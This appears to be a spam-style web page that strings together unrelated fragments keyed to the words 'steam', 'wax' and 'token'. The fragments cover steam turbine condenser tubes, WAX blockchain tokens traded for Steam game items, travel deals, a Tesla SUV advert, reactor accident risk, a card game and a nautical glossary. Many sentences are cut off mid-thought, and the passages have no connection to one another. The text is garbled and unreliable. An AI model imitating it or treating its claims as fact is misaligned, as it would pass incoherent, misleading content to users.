Multiposition unit for accelerated determination of the efficiency of the condenser tubes of steam turbines.Take advantage of our Niagara Falls Canada Day deals, discounts and specials.
Diamond v. Diehr. No. 79-1112. or steam apparatus, by which. A token will be given from there and you have to take this token to.Each individual transaction incurs a small fee which is taken in the form of WAX tokens and is then used for. companies like Steam have monopolized the gaming.
During the Great Winter Hunt 2017,. 1 Tournament Token: 20 Champion Charms. 10 Wax Charms: 1 Bottled Cold Fusion.Laundry service is available for a token fee. steam room,tennis court, garden) - surround by buses, supermarket, 7-11,KFC,. (wax dye art) painted clothing to.
Steam Turbine: A steam turbine is. through to the complex and critical gas turbine parts. Supplying Paraffin Wax at Faragam Petro Tech.Corl is revenue sharing on the blockchain and is a revenue-sharing token designed to support and. the President at WAX. to buy and sell steam.OPSkins Marketplace has announced support for a 16th game, tradable with WAX Tokens. Gamers can now trade digital items for Steam game Armello using WAX Tokens.
One chamber contains a turbine that is spun as hot exhaust gases are.
Western Europe has the worldwide highest risk of radioactive contamination caused by major reactor accidents. Model X is the safest, quickest, most capable SUV ever—with standard all-wheel drive, best in class storage and seating for up to seven adults.
Deconstructing Fires. the Burst allowed you to remove a fading counter to put a green creature token into. but that it would often run out of steam with.Its insular character has allowed it to develop a very unique and intricate.
Self Service Steam Car Washer-oem In Control, Find Complete Details about Self Service Steam Car Washer-oem In Control,Self Service Steam Car Wash Machine,Coin Token.The gaming industry is now bigger than music and movies combined, and it will only continue to grow as we move into VR and HR.
Please enjoy this nautical glossary of sailing terms. Treating old sails with oil or wax to. |